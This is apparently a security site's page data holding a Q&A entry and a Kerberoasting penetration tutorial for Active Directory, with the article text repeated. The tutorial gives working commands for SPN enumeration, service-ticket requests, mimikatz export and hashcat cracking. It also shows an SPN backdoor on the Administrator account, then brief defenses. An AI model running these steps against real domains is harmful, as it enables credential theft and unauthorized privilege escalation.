[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ftg3qm2IfU2M_SochRPOUw9L5iGnuFUytXM5PrCVQlPc":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},568,"What is the difference between machine account SPNs and user account SPNs in Kerberoasting?","Machine account SPNs are registered under computer objects and use a random, complex password that cannot be used for remote logon, making them worthless for cracking. User account SPNs are registered under domain user objects, and their passwords can be cracked offline and reused for lateral movement. This distinction is why attackers focus on domain user SPNs, as explained in the [Domain Penetration - Kerberoasting](\u002Fnews\u002Fdomain-penetration-kerberoasting) article.","\u003Cp>Machine account SPNs are registered under computer objects and use a random, complex password that cannot be used for remote logon, making them worthless for cracking. User account SPNs are registered under domain user objects, and their passwords can be cracked offline and reused for lateral movement. This distinction is why attackers focus on domain user SPNs, as explained in the [Domain Penetration - Kerberoasting](\u002Fnews\u002Fdomain-penetration-kerberoasting) article.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-kerberoasting\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-the-difference-between-machine-account-spns-and-user-account-spns-in-ker-1777482976808","machine account, user account, SPN type, password cracking, lateral movement",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},139,"Domain Penetration - Kerberoasting","domain-penetration-kerberoasting","Learn Kerberoasting principles, implementation, backdoor exploits, and defense strategies for domain penetration in Active Directory environments.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Kerberoasting is a commonly used technique in domain penetration. This article will refer to publicly available materials and combine personal understanding to detail the principles and implementation of Kerberoasting, as well as a method for backdoor exploitation, concluding with defensive recommendations.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Fpowershell\u002Fkerberoasting-without-mimikatz\u002F\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Fredteaming\u002Ffrom-kekeo-to-rubeus\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalicious.link\u002Fpost\u002F2016\u002Fkerberoast-pt1\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalicious.link\u002Fpost\u002F2016\u002Fkerberoast-pt2\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalicious.link\u002Fpost\u002F2016\u002Fkerberoast-pt3\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fadsecurity.org\u002F?p=3458\u003C\u002Fp>\u003Cp>https:\u002F\u002Fadsecurity.org\u002F?page_id=183\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.netspi.com\u002Ffaster-domain-escalation-using-ldap\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsocial.technet.microsoft.com\u002Fwiki\u002Fcontents\u002Farticles\u002F717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Kerberoasting related concepts\u003C\u002Fli>\u003Cli>Principles of Kerberoasting\u003C\u002Fli>\u003Cli>Implementation of Kerberoasting\u003C\u002Fli>\u003Cli>Backdoor exploitation in Kerberoasting\u003C\u002Fli>\u003Cli>Defense against Kerberoasting\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>SPN\u003C\u002Fh3>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FAD\u002Fservice-principal-names\u003C\u002Fp>\u003Cp>Full name: Service Principal Names\u003C\u002Fp>\u003Cp>SPN is the unique identifier for services running on a server; every service using Kerberos requires an SPN\u003C\u002Fp>\u003Cp>There are two types of SPNs: one registered under machine accounts (Computers) in AD, and the other registered under domain user accounts (Users)\u003C\u002Fp>\u003Cp>When a service runs under the Local System or Network Service account, the SPN is registered under the machine account (Computers).\u003C\u002Fp>\u003Cp>When a service runs under a domain user account, the SPN is registered under the domain user account (Users).\u003C\u002Fp>\u003Ch3>SPN format\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>serviceclass\u002Fhost:port\u002Fservicename\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Explanation:\u003C\u002Fp>\u003Cul>\u003Cli>serviceclass can be understood as the service name, common examples include www, ldap, SMTP, DNS, HOST.\u003C\u002Fli>\u003Cli>host has two forms: FQDN and NetBIOS name, e.g., server01.test.com and server01.\u003C\u002Fli>\u003Cli>If the service runs on the default port, the port number (port) can be omitted.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Querying SPN\u003C\u002Fh3>\u003Cp>Initiating an LDAP query to the domain controller is part of normal Kerberos ticket behavior, so SPN query operations are difficult to detect.\u003C\u002Fp>\u003Ch4>(1) Using SetSPN\u003C\u002Fh4>\u003Cp>Built-in tool in Windows 7 and Windows Server 2008.\u003C\u002Fp>\u003Cp>View all SPNs in the current domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View all SPNs in the test domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -T test -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example output:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CN=DC1,OU=Domain Controllers,DC=test,DC=com\u003Cbr>        exchangeRFR\u002FDC1\u003Cbr>        exchangeRFR\u002FDC1.test.com\u003Cbr>        exchangeMDB\u002FDC1.test.com\u003Cbr>        exchangeMDB\u002FDC1\u003Cbr>        exchangeAB\u002FDC1\u003Cbr>        exchangeAB\u002FDC1.test.com\u003Cbr>        SMTP\u002FDC1\u003Cbr>        SMTP\u002FDC1.test.com\u003Cbr>        SmtpSvc\u002FDC1\u003Cbr>        SmtpSvc\u002FDC1.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002FForestDnsZones.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002FDomainDnsZones.test.com\u003Cbr>        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04\u002FDC1.test.com\u003Cbr>        DNS\u002FDC1.test.com\u003Cbr>        GC\u002FDC1.test.com\u002Ftest.com\u003Cbr>        RestrictedKrbHost\u002FDC1.test.com\u003Cbr>        RestrictedKrbHost\u002FDC1\u003Cbr>        HOST\u002FDC1\u002FTEST\u003Cbr>        HOST\u002FDC1.test.com\u002FTEST\u003Cbr>        HOST\u002FDC1\u003Cbr>        HOST\u002FDC1.test.com\u003Cbr>        HOST\u002FDC1.test.com\u002Ftest.com\u003Cbr>        E3514235-4B06-11D1-AB04-00C04FC2DCD2\u002F0f33253b-2314-40f0-b665-f4317b13e6b9\u002Ftest.com\u003Cbr>        ldap\u002FDC1\u002FTEST\u003Cbr>        ldap\u002F0f33253b-2314-40f0-b665-f4317b13e6b9._msdcs.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002FTEST\u003Cbr>        ldap\u002FDC1\u003Cbr>        ldap\u002FDC1.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002Ftest.com\u003Cbr>CN=krbtgt,CN=Users,DC=test,DC=com\u003Cbr>        kadmin\u002Fchangepw\u003Cbr>CN=COMPUTER01,CN=Computers,DC=test,DC=com\u003Cbr>        RestrictedKrbHost\u002FCOMPUTER01\u003Cbr>        HOST\u002FCOMPUTER01\u003Cbr>        RestrictedKrbHost\u002FCOMPUTER01.test.com\u003Cbr>        HOST\u002FCOMPUTER01.test.com\u003Cbr>CN=MSSQL Service Admin,CN=Users,DC=test,DC=com\u003Cbr>        MSSQLSvc\u002FDC1.test.com\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Each line starting with CN represents an account, and the information below it is the SPN associated with that account.\u003C\u002Fp>\u003Cp>For the output data above, the machine accounts (Computers) are:\u003C\u002Fp>\u003Cul>\u003Cli>CN=DC1,OU=Domain Controllers,DC=test,DC=com\u003C\u002Fli>\u003Cli>CN=COMPUTER01,CN=Computers,DC=test,DC=com\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Domain user accounts (Users) are:\u003C\u002Fp>\u003Cul>\u003Cli>CN=krbtgt,CN=Users,DC=test,DC=com\u003C\u002Fli>\u003Cli>CN=MSSQL Service Admin,CN=Users,DC=test,DC=com\u003C\u002Fli>\u003C\u002Ful>\u003Cp>There are two SPNs registered under the domain user account (Users): kadmin\u002Fchangepw and MSSQLSvc\u002FDC1.test.com\u003C\u002Fp>\u003Ch2>0x03 Principle of Kerberoasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>1. Kerberos Authentication Process\u003C\u002Fh4>\u003Cp>A simple Kerberos authentication process is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017971261_0_faf2f968e3.jpeg\">\u003C\u002Fp>\u003Col>\u003Cli>as_request\u003C\u002Fli>\u003Cli>as_reply\u003C\u002Fli>\u003Cli>tgs_request\u003C\u002Fli>\u003Cli>tgs_reply\u003C\u002Fli>\u003Cli>ap_request\u003C\u002Fli>\u003Cli>ap_reply\u003C\u002Fli>\u003C\u002Fol>\u003Cp>For 4.tgs_reply, the user will receive a TGS (service ticket) encrypted with the NTLM hash of the target service instance, using the RC4-HMAC encryption algorithm.\u003C\u002Fp>\u003Cp>From an exploitation perspective, after obtaining this TGS, we can attempt to brute-force passwords, simulate the encryption process, generate a TGS for comparison. If the TGS matches, it indicates the password is correct, allowing us to obtain the plaintext password of the target service instance.\u003C\u002Fp>\u003Ch4>2. Windows systems obtain the mapping between services and service instance accounts through SPN queries.\u003C\u002Fh4>\u003Cp>Here is an example:\u003C\u002Fp>\u003Cp>User a wants to access resources of the MySQL service. During step 4.tgs_reply, the process is as follows:\u003C\u002Fp>\u003Cp>(1) The Domain Controller queries the SPN of the MySQL service.\u003C\u002Fp>\u003Cp>If the SPN is registered under a machine account (Computers), it will query the servicePrincipalName attribute of all machine accounts (Computers) to find the corresponding account.\u003C\u002Fp>\u003Cp>If the SPN is registered under a domain user account (Users), it will query the servicePrincipalName attribute of all domain users (Users) to find the corresponding account.\u003C\u002Fp>\u003Cp>(2) After finding the corresponding account, use the NTLM hash of that account to generate the TGS.\u003C\u002Fp>\u003Ch4>3. All hosts within the domain can query SPNs.\u003C\u002Fh4>\u003Ch4>4. Any user within the domain can request a TGS from any service within the domain.\u003C\u002Fh4>\u003Cp>In summary, any host within the domain can query SPNs, request TGSs from all services within the domain, and then perform brute-force attacks on the obtained TGSs.\u003C\u002Fp>\u003Cp>For the plaintext passwords obtained through cracking, only the passwords of domain user accounts (Users) are valuable, as machine account passwords cannot be used for remote connections.\u003C\u002Fp>\u003Cp>Therefore, an efficient exploitation approach is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Query SPNs to identify valuable SPNs, which must meet the following conditions:\u003C\u002Fli>\u003C\u002Fol>\u003Cul>\u003Cli>The SPN is registered under a domain user account (Users)\u003C\u002Fli>\u003Cli>Domain user accounts have high privileges\u003C\u002Fli>\u003C\u002Ful>\u003Col>\u003Cli>Request TGS\u003C\u002Fli>\u003Cli>Export TGS\u003C\u002Fli>\u003Cli>Brute force cracking\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x04 Kerberoasting Implementation Method One\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Obtain valuable SPNs\u003C\u002Fh3>\u003Cp>Must meet the following conditions:\u003C\u002Fp>\u003Cul>\u003Cli>The SPN is registered under a domain user account (Users)\u003C\u002Fli>\u003Cli>Domain user accounts have high privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>You can choose from the following three methods:\u003C\u002Fp>\u003Ch4>(1) Using the PowerShell Active Directory module\u003C\u002Fh4>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The PowerShell Active Directory module must be installed in advance; domain controllers typically have it installed\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module ActiveDirectory\u003Cbr>get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For systems without the Active Directory module installed, you can import the Active Directory module using the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\Microsoft.ActiveDirectory.Management.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Microsoft.ActiveDirectory.Management.dll is generated after installing the PowerShell Active Directory module. I have extracted it and uploaded it to GitHub:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch4>(2) Using PowerView\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Using kerberoast\u003C\u002Fh4>\u003Cp>powershell:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnidem\u002Fkerberoast\u002Fblob\u002Fmaster\u002FGetUserSPNs.ps1\u003C\u002Fp>\u003Cp>vbs:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnidem\u002Fkerberoast\u002Fblob\u002Fmaster\u002FGetUserSPNs.vbs\u003C\u002Fp>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cscript GetUserSPNs.vbs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Request TGS\u003C\u002Fh3>\u003Ch4>(1) Request specific TGS\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$SPNName = 'MSSQLSvc\u002FDC1.test.com'\u003Cbr>Add-Type -AssemblyName System.IdentityModel\u003Cbr>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Request all TGS\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-Type -AssemblyName System.IdentityModel\u003Cbr>setspn.exe -q *\u002F* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, enter klist to view tickets in memory, where the obtained TGS can be found\u003C\u002Fp>\u003Ch3>3. Export\u003C\u002Fh3>\u003Cp>Using mimikatz\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>kerberos::list \u002Fexport\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Crack\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fnidem\u002Fkerberoast\u002Fblob\u002Fmaster\u002Ftgsrepcrack.py\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Ftgsrepcrack.py wordlist.txt test.kirbi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 Kerberoasting Implementation Method Two\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Automated implementation without requiring mimikatz, works with standard user privileges. Reference: \u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Fpowershell\u002Fkerberoasting-without-mimikatz\u002F\u003C\u002Fp>\u003Cp>Code repository: \u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FEmpireProject\u002FEmpire\u002Fcommit\u002F6ee7e036607a62b0192daed46d3711afc65c3921\u003C\u002Fp>\u003Cp>Uses System.IdentityModel.Tokens.KerberosRequestorSecurityToken to request TGS, extracts TGS from the returned results. The output TGS can be cracked using John the Ripper or Hashcat.\u003C\u002Fp>\u003Cp>Example demonstration: \u003C\u002Fp>\u003Cp>Execute on a domain host with standard user privileges: \u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>-AdminCount selects high-privilege users\u003C\u002Fp>\u003Cp>Output result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017978708_1_19008d292a.jpeg\">\u003C\u002Fp>\u003Cp>Parameter to extract only the hash is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The output result is shown in the following figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017987125_2_5e1a89dc02.jpeg\">\u003C\u002Fp>\u003Cp>The parameters for cracking with hashcat are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>hashcat -m 13100 \u002Ftmp\u002Fhash.txt \u002Ftmp\u002Fpassword.list -o found.txt --force\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The cracking result is shown in the following figure, successfully obtaining the plaintext password MySQLAdmin111!\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017992268_3_93f75387e0.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Rubeus can also achieve the functionality of Invoke-Kerberoast, with the address as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FRubeus\u003C\u002Fp>\u003Cp>The parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Rubeus.exe kerberoast\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x06 Backdoor Exploitation of Kerberoasting\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After obtaining the permission to modify SPN, we can add an SPN for a specified domain user, allowing us to obtain the TGS for that domain user at any time, and after cracking, obtain the plaintext password\u003C\u002Fp>\u003Cp>For example, to add SPN VNC\u002FDC1.test.com for the domain user Administrator, the parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -U -A VNC\u002FDC1.test.com Administrator\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017996207_4_2be4223833.jpeg\">\u003C\u002Fp>\u003Cp>This SPN can be obtained from any host within the domain, and Kerberoast can be used to obtain the TGS, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017999097_5_c68e5993b4.jpeg\">\u003C\u002Fp>\u003Cp>Then use hashcat to crack it\u003C\u002Fp>\u003Cp>\u003Cstrong>Additional note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The parameters to delete the SPN are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -D VNC\u002FDC1.test.com Administrator\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x07 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>From a defensive perspective, it is impossible to prevent kerberoasting, but for SPNs with high attack value (registered under domain user accounts with high privileges), increasing password length can enhance cracking difficulty, and regularly changing the associated domain user passwords is recommended.\u003C\u002Fp>\u003Cp>Administrators can use Invoke-Kerberoast on a host within the domain to check for dangerous SPNs.\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1\u003C\u002Fp>\u003Cp>Parameters:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article provides a detailed introduction to the principles, methods, and defenses of Kerberoasting, along with practical demonstrations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Kerberoasting is a commonly used technique in domain penetration. This article will refer to publicly available materials and combine personal understanding to detail the principles and implementation of Kerberoasting, as well as a method for backdoor exploitation, concluding with defensive recommendations.\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Fpowershell\u002Fkerberoasting-without-mimikatz\u002F\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.harmj0y.net\u002Fblog\u002Fredteaming\u002Ffrom-kekeo-to-rubeus\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalicious.link\u002Fpost\u002F2016\u002Fkerberoast-pt1\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalicious.link\u002Fpost\u002F2016\u002Fkerberoast-pt2\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmalicious.link\u002Fpost\u002F2016\u002Fkerberoast-pt3\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fadsecurity.org\u002F?p=3458\u003C\u002Fp>\u003Cp>https:\u002F\u002Fadsecurity.org\u002F?page_id=183\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.netspi.com\u002Ffaster-domain-escalation-using-ldap\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsocial.technet.microsoft.com\u002Fwiki\u002Fcontents\u002Farticles\u002F717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Kerberoasting related concepts\u003C\u002Fli>\u003Cli>Principles of Kerberoasting\u003C\u002Fli>\u003Cli>Implementation of Kerberoasting\u003C\u002Fli>\u003Cli>Backdoor exploitation in Kerberoasting\u003C\u002Fli>\u003Cli>Defense against Kerberoasting\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>SPN\u003C\u002Fh3>\u003Cp>Official documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fdesktop\u002FAD\u002Fservice-principal-names\u003C\u002Fp>\u003Cp>Full name: Service Principal Names\u003C\u002Fp>\u003Cp>SPN is the unique identifier for services running on a server; every service using Kerberos requires an SPN\u003C\u002Fp>\u003Cp>There are two types of SPNs: one registered under machine accounts (Computers) in AD, and the other registered under domain user accounts (Users)\u003C\u002Fp>\u003Cp>When a service runs under the Local System or Network Service account, the SPN is registered under the machine account (Computers).\u003C\u002Fp>\u003Cp>When a service runs under a domain user account, the SPN is registered under the domain user account (Users).\u003C\u002Fp>\u003Ch3>SPN format\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>serviceclass\u002Fhost:port\u002Fservicename\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Explanation:\u003C\u002Fp>\u003Cul>\u003Cli>serviceclass can be understood as the service name, common examples include www, ldap, SMTP, DNS, HOST.\u003C\u002Fli>\u003Cli>host has two forms: FQDN and NetBIOS name, e.g., server01.test.com and server01.\u003C\u002Fli>\u003Cli>If the service runs on the default port, the port number (port) can be omitted.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Querying SPN\u003C\u002Fh3>\u003Cp>Initiating an LDAP query to the domain controller is part of normal Kerberos ticket behavior, so SPN query operations are difficult to detect.\u003C\u002Fp>\u003Ch4>(1) Using SetSPN\u003C\u002Fh4>\u003Cp>Built-in tool in Windows 7 and Windows Server 2008.\u003C\u002Fp>\u003Cp>View all SPNs in the current domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View all SPNs in the test domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>setspn.exe -T test -q *\u002F*\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Example output:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>CN=DC1,OU=Domain Controllers,DC=test,DC=com\u003Cbr>        exchangeRFR\u002FDC1\u003Cbr>        exchangeRFR\u002FDC1.test.com\u003Cbr>        exchangeMDB\u002FDC1.test.com\u003Cbr>        exchangeMDB\u002FDC1\u003Cbr>        exchangeAB\u002FDC1\u003Cbr>        exchangeAB\u002FDC1.test.com\u003Cbr>        SMTP\u002FDC1\u003Cbr>        SMTP\u002FDC1.test.com\u003Cbr>        SmtpSvc\u002FDC1\u003Cbr>        SmtpSvc\u002FDC1.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002FForestDnsZones.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002FDomainDnsZones.test.com\u003Cbr>        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04\u002FDC1.test.com\u003Cbr>        DNS\u002FDC1.test.com\u003Cbr>        GC\u002FDC1.test.com\u002Ftest.com\u003Cbr>        RestrictedKrbHost\u002FDC1.test.com\u003Cbr>        RestrictedKrbHost\u002FDC1\u003Cbr>        HOST\u002FDC1\u002FTEST\u003Cbr>        HOST\u002FDC1.test.com\u002FTEST\u003Cbr>        HOST\u002FDC1\u003Cbr>        HOST\u002FDC1.test.com\u003Cbr>        HOST\u002FDC1.test.com\u002Ftest.com\u003Cbr>        E3514235-4B06-11D1-AB04-00C04FC2DCD2\u002F0f33253b-2314-40f0-b665-f4317b13e6b9\u002Ftest.com\u003Cbr>        ldap\u002FDC1\u002FTEST\u003Cbr>        ldap\u002F0f33253b-2314-40f0-b665-f4317b13e6b9._msdcs.test.com\u003Cbr>        ldap\u002FDC1.test.com\u002FTEST\u003Cbr>        ldap\u002FDC1\u003Cbr>        